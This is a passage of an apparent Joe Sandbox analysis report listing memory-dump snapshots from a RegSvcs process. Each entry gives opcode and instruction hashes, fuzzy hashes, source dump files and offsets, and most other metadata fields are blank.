                                              • Opcode Fuzzy Hash: 857f318e74e7ab378e9fb2fc58431eb559422c58bb868a8f8d0fbedceb6c2e59
                                              • Instruction Fuzzy Hash: 93216A706253068FCB3A9B38D4542AFBBE6EB85380B5044AEC14AC3341DF319C45CB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 34824341e94821880e153fe9438f9e7ea3e031a70199a8582251905f55a7b486
                                              • Instruction ID: b7f886f3bfc416ff49580ce7ad32fab308333b739ec73eda9590394d2b21d2ad
                                              • Opcode Fuzzy Hash: 34824341e94821880e153fe9438f9e7ea3e031a70199a8582251905f55a7b486
                                              • Instruction Fuzzy Hash: 33216A312187468FCB26EF79E45069E7FB2EFC2350F04452EE1868B153DE645D0A87A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4532294306.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_115d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac5c30205ed89a76bb1b0bc0432742261fd9dba2121f388c3de3c916d43624aa
                                              • Instruction ID: 0816f5116d7b2511f06c438b2d073836700dfbd7dde0a2fa7f606d292581a13d
                                              • Opcode Fuzzy Hash: ac5c30205ed89a76bb1b0bc0432742261fd9dba2121f388c3de3c916d43624aa
                                              • Instruction Fuzzy Hash: CF210672504240DFDF49DF54E9C0B26BF65FB84318F20816DED094A256C376D455CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 827e53c802fbc7a1c62290284148b98679ad19bff9086ccf8f6def803ef0d32e
                                              • Instruction ID: d1c88c96a78e22752236e11077140c4423a92986340de7edff65454bb921ee11
                                              • Opcode Fuzzy Hash: 827e53c802fbc7a1c62290284148b98679ad19bff9086ccf8f6def803ef0d32e
                                              • Instruction Fuzzy Hash: 89217FB5B101168FEB18EF65D88587EBBF6FF88200B044168D80AD7252DE39AC01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 882653c4837d4d624aa24ad0b0a9daf3e31e99d68d710ad506e4ce3b16196a3a
                                              • Instruction ID: 95cc21f72adc0021d2caba889b06fed94c07130ac56f18d55064f778da0aa973
                                              • Opcode Fuzzy Hash: 882653c4837d4d624aa24ad0b0a9daf3e31e99d68d710ad506e4ce3b16196a3a
                                              • Instruction Fuzzy Hash: 43212B71B101098FD7189B7AC4547AEBAF7AFC8750F28406AE505EB390DDB09C02C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4532907762.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_116d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1de8c9e77aeef0c553b1a542128ad5c129f89207707bae30e45c79f9f2c9bb78
                                              • Instruction ID: 2ccfae0b29c9acfb93890fcebbc86c5bd8025d4e0216860f94a057ba98071bd1
                                              • Opcode Fuzzy Hash: 1de8c9e77aeef0c553b1a542128ad5c129f89207707bae30e45c79f9f2c9bb78
                                              • Instruction Fuzzy Hash: 422134B5604204EFDF09DF54E9C0B26BBA9FB88314F20C56DD9494B252C3BBD466CA62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cfe7a8fc0ba873ed7fe26abc2f7a75b59c4810669a24edb832b4513e621634a7
                                              • Instruction ID: 0b42e11bd0498e9f08d1a79f2816b8ea2eedb3fc632f89a137aefb2508af9752
                                              • Opcode Fuzzy Hash: cfe7a8fc0ba873ed7fe26abc2f7a75b59c4810669a24edb832b4513e621634a7
                                              • Instruction Fuzzy Hash: 7B1106F170021AEBF728A768D48092EFBD6AFC9620B944569D60DCF614EF64EC45C381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdca21068fa72db25febc7a046053a6d37f53cb6c3c1165f53bed551bac5909e
                                              • Instruction ID: 7d3f52f935ae7a3f043dcc22fea54eb810f75ca3fd0fc5ffc3a345ba42a8102f
                                              • Opcode Fuzzy Hash: fdca21068fa72db25febc7a046053a6d37f53cb6c3c1165f53bed551bac5909e
                                              • Instruction Fuzzy Hash: 5D1104F370822A9FF715CA69E841AAAF7E9EBC4370F048537E918CB140EA35E511C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 38d631127680114bf5c8660a038bc4651570e6346d01c621aa7d7b9b19db792c
                                              • Instruction ID: 25121951db86d6db8a3f60651ee7c547d4663f089bb5be1006ca8df84a7980ec
                                              • Opcode Fuzzy Hash: 38d631127680114bf5c8660a038bc4651570e6346d01c621aa7d7b9b19db792c
                                              • Instruction Fuzzy Hash: 3221D5B13053419FE3268F25D480956BFF6EF82328704C6AAD98A87712CA32EC45D750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 029dbac8b815dfc63beca1f5de37778b9c47b2ea154050cca721385774d0a304
                                              • Instruction ID: 3df671e90e4fbff20b09f89329db71ed2476689e502e14a238ca096b587f132b
                                              • Opcode Fuzzy Hash: 029dbac8b815dfc63beca1f5de37778b9c47b2ea154050cca721385774d0a304
                                              • Instruction Fuzzy Hash: 362149B2A24384CBDF269B34C8243DA3BF0BB1A380F2440AED005EB392C7758D06C761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4d55981c4785e1500cc1368445a96499a4249a084e3952eaa5f47c6131222f0
                                              • Instruction ID: cf91846556ef1b879dcb50136f59f96d7979a6ad4e07754d1afed7ea2f8390dc
                                              • Opcode Fuzzy Hash: c4d55981c4785e1500cc1368445a96499a4249a084e3952eaa5f47c6131222f0
                                              • Instruction Fuzzy Hash: 2711B2713052159FE7251F7AB449669BBAAFBC0A22718857AE509CA281CF26D882C750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3247fc746423631abc84102fafcdbc96909ac84e850a1d8037a43ebbbb467ed6
                                              • Instruction ID: dc08daf68299d88531e5cf50f4c8f20455b8c277fa75ad665c173cc7645f8897
                                              • Opcode Fuzzy Hash: 3247fc746423631abc84102fafcdbc96909ac84e850a1d8037a43ebbbb467ed6
                                              • Instruction Fuzzy Hash: F121FFB0A1524ADFCF21DF69D8C48EABBB9FF853007008566EA85D7652D730B950CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a29c07ec10f5f9a323c49ad5b413a9f4d23b85ab5ac37589dcb8addbe6c86965
                                              • Instruction ID: ae910ed60ac6da25b77ad08489c0496bee77772f2cb746a7589c78c7724b308e
                                              • Opcode Fuzzy Hash: a29c07ec10f5f9a323c49ad5b413a9f4d23b85ab5ac37589dcb8addbe6c86965
                                              • Instruction Fuzzy Hash: F821A1717153118FCB25DB68D4849AEBBF5EF853503198569DC4A9B352CB30FC418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42b6ea9702228fa2242928c1ad4e5cd7f0f7b2f459090d647e9a80f9b6f4ea94
                                              • Instruction ID: 7ab77188bfb94920b05e91b232b8c206f3ccd646cade31acd173355db4a3dc9c
                                              • Opcode Fuzzy Hash: 42b6ea9702228fa2242928c1ad4e5cd7f0f7b2f459090d647e9a80f9b6f4ea94
                                              • Instruction Fuzzy Hash: B621B370A00205DFDF4AFB34E454AADBBB2EF81350B50866DC5059F395DB719A0ACBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e9c8a6432b0cccbc891864868de82b9e3a62ec2d5f47120c166abefa14f2033
                                              • Instruction ID: 070bdce46f288fdde58a0266aa915a0e7a55886eee7bbe6de8224f399c276b55
                                              • Opcode Fuzzy Hash: 4e9c8a6432b0cccbc891864868de82b9e3a62ec2d5f47120c166abefa14f2033
                                              • Instruction Fuzzy Hash: 09117F707101149FEB48DB29C858B5E77FAAF8CB10F264199E506DB3A1CF71DC018B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c522e87806a46c0bdc39c29ad38ca2d32848c6c58430eba268ee7b5eee4d91e7
                                              • Instruction ID: 5c686030ff7c777f37a0c92ecd581c25ee05d4a513f59ed0d5d0b708b8e088e9
                                              • Opcode Fuzzy Hash: c522e87806a46c0bdc39c29ad38ca2d32848c6c58430eba268ee7b5eee4d91e7
                                              • Instruction Fuzzy Hash: 4B215E71601340AFD315DF24D488E56BFF6EF85314B1584AAE5868B3A2CB71ED45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee7e6895386bfe9ec4ef0e0ccb5822f10186c65c35972e5753b9285f1880a1c5
                                              • Instruction ID: bb44663d2b251de22f432d60ccf637f14ae28be6624c405be7b5eb912e8b37fc
                                              • Opcode Fuzzy Hash: ee7e6895386bfe9ec4ef0e0ccb5822f10186c65c35972e5753b9285f1880a1c5
                                              • Instruction Fuzzy Hash: 21214CB6F40269CBDF04DFB8E940AEDBBF2AB88214F108169D909E7345DB319D01DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ff5d751fec3731dd21138dd245e85b85db1ffcf34e62ba9d4851a7f15a6f3c0
                                              • Instruction ID: 4c0dcfb7c8f80654acc1c1008160465d8324613acf3da9bc4d5380e4b2138529
                                              • Opcode Fuzzy Hash: 0ff5d751fec3731dd21138dd245e85b85db1ffcf34e62ba9d4851a7f15a6f3c0
                                              • Instruction Fuzzy Hash: F221A47160034BDFEB0AEF2DE880A5E3FA6EBC0344B00A61DE5189B215DFB4AD4597D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 729f1ecb6fd3f9001d4f85742f2e0f580f935281caa5e82f18b243c129c4dbbd
                                              • Instruction ID: 9f45836e02dd3f87e0b3caa0272350c89f2fa39a5e253d66e3999ad05d1b3310
                                              • Opcode Fuzzy Hash: 729f1ecb6fd3f9001d4f85742f2e0f580f935281caa5e82f18b243c129c4dbbd
                                              • Instruction Fuzzy Hash: 1D012677A192625FE72306628C207FB3F66DF86252B0A41E6EE01C7153C12A8C059360
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee9da485f58b2972b8c2e750b2ae3df4dca8f6108bab3ba7145d74b970d15c5a
                                              • Instruction ID: ccd1bab3c3d41e398184364b63db0299b4ffda119cad6da460ff03b062b5458d
                                              • Opcode Fuzzy Hash: ee9da485f58b2972b8c2e750b2ae3df4dca8f6108bab3ba7145d74b970d15c5a
                                              • Instruction Fuzzy Hash: 9A118970B101098FD7189B6EC4547AEBAE7AFCC750F25401AE515EB3D4CEB05C06CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3e657e39f4f4f2368549a428c3d8d4a6c30764c7f304d95518d636f670d006e
                                              • Instruction ID: 9c98e4eb9252b3de855bcb8ed245ad4a4406249b330f837cecf0f1cc252b5a28
                                              • Opcode Fuzzy Hash: a3e657e39f4f4f2368549a428c3d8d4a6c30764c7f304d95518d636f670d006e
                                              • Instruction Fuzzy Hash: C9218E71A00389AFEF11CFE0C844AAEBFB6FF48310F04845AE905AB296C6349905CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d73f157ae3174e973975b2eba2aee674b415887decb8bf9c94c4c2906b4ad38
                                              • Instruction ID: 421b0649599da4a08d1d0635562867ee73efcc72aa2a087bc167d314a8628453
                                              • Opcode Fuzzy Hash: 8d73f157ae3174e973975b2eba2aee674b415887decb8bf9c94c4c2906b4ad38
                                              • Instruction Fuzzy Hash: 1E21AEB0A1164ADFCF20DF59E8C4CEABBBAFF843107108566D64597651C730B950CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a2cd50b319089ab008161abbe09de8856d0030f1800f059a69890fbcf762b008
                                              • Instruction ID: 2a2a9350875715b6ce66df25ee64f435aeedf6ebd3f8435a6e56a163f989be73
                                              • Opcode Fuzzy Hash: a2cd50b319089ab008161abbe09de8856d0030f1800f059a69890fbcf762b008
                                              • Instruction Fuzzy Hash: 591159312083499FCB069B38D48485D7FBAEFC63103244067E549C7253CB21DC96CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5ab1d8bb4062ebc80fea98c9964dab49028612e2983759b451ee5aec009fde7
                                              • Instruction ID: 3b09715b85964e5e967461d8ae5f5a27123cc56e497f798eba10824ca8b8a675
                                              • Opcode Fuzzy Hash: f5ab1d8bb4062ebc80fea98c9964dab49028612e2983759b451ee5aec009fde7
                                              • Instruction Fuzzy Hash: 8F210A74A002549FCB06DF28D8548AE7FB5FF85321F148196DC558B396CB34AD05DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81453da0cf4e560c20a93e4d0f0a908b4535c8e8b6484991e8305e2857032688
                                              • Instruction ID: 5781cb6a1958d7a7e3a7f5a2d411690c7d3b0d4995c8abad445db86c0f0b671e
                                              • Opcode Fuzzy Hash: 81453da0cf4e560c20a93e4d0f0a908b4535c8e8b6484991e8305e2857032688
                                              • Instruction Fuzzy Hash: C711C8B7B006215FD3259A689C44F6BB7E6EBC8760F11417AEE19DB394DE70EC018790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51cae69f7c2e6ca9721c024f79960c6793efdb0fd2e5672914ba0dcb83007910
                                              • Instruction ID: ea55f1327c9b037d1a6167a5be179f56f9f9fb4ca33b0b6152aeaeafef6e76f1
                                              • Opcode Fuzzy Hash: 51cae69f7c2e6ca9721c024f79960c6793efdb0fd2e5672914ba0dcb83007910
                                              • Instruction Fuzzy Hash: A1114676F00215CBEB289BB5D458AEEBBBAAF88720F140029D90AF3354DF715D45CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Instruction Fuzzy Hash: D901F571301351CFDB0AFB24F45499D3BA2DBC6654B04859DC2018F382DF719E0687E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f26346ba48209364f741cd14ae9402225a9c576f5d71fc37aef0625184ebcf59
                                              • Instruction ID: 7ec8769d85665782a586d5febbad4a06d07249189db49190c9ab2d1c848810a4
                                              • Opcode Fuzzy Hash: f26346ba48209364f741cd14ae9402225a9c576f5d71fc37aef0625184ebcf59
                                              • Instruction Fuzzy Hash: 9C012971700205DFD708DF29D884D5ABBFAEF89321B1545AAE909CB322DB71EC01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9e9f92d40be21dd69409dc18596f2f08150d8ebb3b73e5a9c3c7513cef8a2f2
                                              • Instruction ID: 57ea2bac45687a4c39918b5aa6a90a9cd611fed4124e7958fc530d5893284a71
                                              • Opcode Fuzzy Hash: b9e9f92d40be21dd69409dc18596f2f08150d8ebb3b73e5a9c3c7513cef8a2f2
                                              • Instruction Fuzzy Hash: 28011771700205DFD718DF2AD884D5ABBFAEF88321B1585AAE909CB321DB71EC018B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e7ddce2b11953fff7bca900f674d342bc6067d17d691a6f4d2d08ffe83dab08
                                              • Instruction ID: 469177d1099f32250b51e2b4046622db095d5fb4753fc8b82dbe56d56c9d2e77
                                              • Opcode Fuzzy Hash: 0e7ddce2b11953fff7bca900f674d342bc6067d17d691a6f4d2d08ffe83dab08
                                              • Instruction Fuzzy Hash: A50196717105089FCB149B29C959BAE7BF6EF8C710F214069E502E73A0CFB19D01CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 993696f04a6500882245225e8f1cf65a33e16bd7da3c3377c717d366ced12ace
                                              • Instruction ID: c2e2db3f9f914e1cdc699476737dadfc01f7d0ade3fe0d64c06dc901a5e27c95
                                              • Opcode Fuzzy Hash: 993696f04a6500882245225e8f1cf65a33e16bd7da3c3377c717d366ced12ace
                                              • Instruction Fuzzy Hash: EF015E71A11219EFDB14DF64D84A6AF7BB9FF88750F044439E91AD3241DB358D10CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df053892781884fb00ea1029ec063fd535083535d1337fb9c3acedf8da9d1fd8
                                              • Instruction ID: 5365dc81fe3dddc24afdf435a6d881077ecaf8d12c7f18a89368b082f55b1358
                                              • Opcode Fuzzy Hash: df053892781884fb00ea1029ec063fd535083535d1337fb9c3acedf8da9d1fd8
                                              • Instruction Fuzzy Hash: DC115AB4D10218ABEB14DFA9D940AEEBBF2AF48350F108119E804B6351CB305940CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c715cb9e250633708291f23b8dad093119e862db4f6da329c7614c1433aedbbc
                                              • Instruction ID: 1705ea8aa72681284a724de6195f78fe28dd0912447117636ac065dac22c8b1c
                                              • Opcode Fuzzy Hash: c715cb9e250633708291f23b8dad093119e862db4f6da329c7614c1433aedbbc
                                              • Instruction Fuzzy Hash: CEF08173700215AF9B54DE59F845DBFBBAEFBC8264714812AF509C3200DF319815DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1974bd8d02406c8ce0202f82735f3e92a00b9f8f47a9e412ccd1370c9667a93
                                              • Instruction ID: 86f9fa3d7ec6e3f5f0bb04d95b3b68b6ded607e2adbdf13a4446cd5b113a4e7c
                                              • Opcode Fuzzy Hash: b1974bd8d02406c8ce0202f82735f3e92a00b9f8f47a9e412ccd1370c9667a93
                                              • Instruction Fuzzy Hash: FE01D271200706CBD729DF29D84094BBBF5EFC4350B009A2DE55997665DBB0FD058B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14cdc7d4360ef32eb0dfbfdf5836f098829728e3b76abbc25a56bd2675d37673
                                              • Instruction ID: 62491651cf2a8882921fca16d1c0fb6f6c3c8e4190621dc11cf8959fe1ad2579
                                              • Opcode Fuzzy Hash: 14cdc7d4360ef32eb0dfbfdf5836f098829728e3b76abbc25a56bd2675d37673
                                              • Instruction Fuzzy Hash: F0F04F353146918FC705DB3EE8588A9BBE69FCA66031580ABE60ACB372EF71DC018750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c62cdba9aaa65ff58da2845cff0460cac787f943bdc76a1998ba7b7a2fce95d9
                                              • Instruction ID: 9404a71275940cb0f535726e38040d0b890acddaa17b4b729337ac7acb7ce826
